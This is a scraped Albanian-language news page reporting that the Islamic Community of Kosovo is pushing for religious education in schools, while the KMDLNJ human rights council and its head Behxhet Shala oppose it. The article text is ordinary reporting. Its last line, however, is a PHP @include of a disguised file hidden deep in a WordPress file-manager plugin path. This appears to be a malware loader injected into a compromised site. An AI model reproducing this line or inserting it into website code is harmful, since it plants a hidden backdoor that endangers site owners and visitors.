Sexta-feira, 12/4/2024 | : : UTC+0
Mjeksia Islame
United States
+11C

Bashkësia Islame e Kosovës kërkon edukatë fetare në shkolla

Bashkësia Islame e Kosovës kërkon edukatë fetare në shkolla

Sipas kryetarit të KMDLNJ-së, Behxhet Shala, shoqërisë kosovare nuk do t’i bënte mirë futja e lëndëve fetare nëpër shkolla. Shala vlerëson se edhe po të ndërmerrej një hap i tillë, Kosova nuk ka kuadro të fushës.

bashkesia islame

Bashkësia Islame e Kosovës dhe grupe të ndryshme fetare ka kohë që po kërkojnë futjen e edukatës fetare nëpër shkolla. Mirëpo, kjo kërkesë shihet si e rrezikshme për shoqërinë kosovare, transmeton KTV. Këshilli për Mbrojtjen e të Drejtave dhe Lirive të Njeriut është kundër kësaj iniciative.

 

Sipas kryetarit të KMDLNJ-së, Behxhet Shala, shoqërisë kosovare nuk do t’i bënte mirë futja e lëndëve fetare nëpër shkolla. Shala vlerëson se edhe po të ndërmerrej një hap i tillë, Kosova nuk ka kuadro të fushës. Me këtë çështje është duke u marrë edhe Komisioni Këshillëdhënës për Liritë Fetare, i formuar nga kryeministri Hashim Thaçi.

 

Anëtari i këtij komisioni, Petrit Selimi, konsideron se në shkollat kosovare ligjërimi për fetë bëhet në mënyrë të gabuar. Ndërkohë, Ministria e Arsimit nuk ka bërë ndonjë hulumtim se a ka kuadro të mjaftueshme për të ligjëruar këto lëndë.

@include "wp-content/plugins/wp-file-manager/lib/codemirror/mode/eiffel/include/7260.ed";